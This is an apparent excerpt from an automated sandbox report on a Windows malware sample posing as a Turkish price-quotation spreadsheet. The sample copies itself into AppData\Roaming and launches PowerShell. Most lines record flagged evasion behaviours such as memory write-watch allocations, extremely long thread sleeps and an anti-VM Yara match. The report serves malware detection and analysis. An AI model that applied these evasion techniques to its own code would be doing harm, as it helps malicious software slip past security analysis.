Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7472, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 27D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 29C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 27D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 7AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 8AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 8C60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 9C60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 1610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 3040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 2E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 2B30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 2CD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 4CD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 7A00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 8A00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 8BB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 9BB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 14B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 2F60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Memory allocated: 4F60000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599543 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598828 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597448 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596780 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595531 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594512 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594281 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594172 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594062 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 593844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599860
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598691
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596229
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594389
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594281
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7908 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1623 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7776 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1141 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Window / User API: threadDelayed 2604 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Window / User API: threadDelayed 7232 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Window / User API: threadDelayed 2192
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Window / User API: threadDelayed 7652
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7096 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7968 Thread sleep count: 2604 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7968 Thread sleep count: 7232 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599543s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597448s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -597000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596780s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -596094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -595078s >= -30000s Jump to behavior
